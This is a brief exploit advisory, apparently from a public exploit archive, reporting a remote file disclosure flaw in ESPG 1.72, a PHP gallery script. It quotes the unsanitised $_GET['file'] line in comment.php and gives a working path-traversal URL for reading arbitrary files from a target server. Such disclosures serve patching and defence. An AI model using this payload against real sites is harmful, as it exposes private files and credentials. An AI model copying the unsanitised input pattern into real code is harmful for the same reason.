ESPG (Enhance Simple PHP Gallery) version 1.72 suffers from a remote file disclosure vulnerability.
ccde4b30f6a1c07e8a1edf51c4d70feb905aedd88ae8c1b6c1d18a97e5ed70cb
.::ESPG 1.72 File Disclosure Vulnerability::.
=> Scriptname: ESPG (Enhanced Simple PHP Gallery) 1.72
=> Vendor: http://quirm.net
=> Download: http://quirm.net/download/21/
=> Bugfounder: bd0rk
=> Contact: bd0rk[at]hackermail.com
=> Greetings: str0ke, TheJT, Maria, Alucard, x0r_32
=> Vulnerable Code in comment.php line 3
-------------------------
$fileid = $_GET['file'];
-------------------------
[+]Sploit: http://[t4rg3t]/gallery/comment.php?file=../../TARGETFILE.php
###The 20 years old, german Hacker bd0rk###
=> 'GAINST WAR IN ISRAEL AND GAZA!!! <=